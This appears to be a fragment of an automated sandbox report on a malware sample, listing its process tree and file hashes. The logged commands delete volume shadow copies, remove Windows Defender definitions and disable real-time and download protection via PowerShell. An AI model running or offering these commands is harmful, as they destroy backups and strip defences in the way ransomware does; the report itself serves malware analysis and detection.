C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3120 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3928
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1496 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1764 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3388
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5 46213c672e82f1f8c20669652a1606a5
SHA1 b0c123a57ae84b56a8559c4c964066274e2d1ad4
SHA256 7d8e1c5b27262d3330fd6535755326519e523f27946933e7352d9c681a3b3d71
SHA512 c58884ac19a9069d93916bb4fea48579d6ce653822b5ab1fb5ca146747bd4707600886d9febe2a810e3699aca3e8ecf9184f340f6ca6f6461329c551d1ef6b45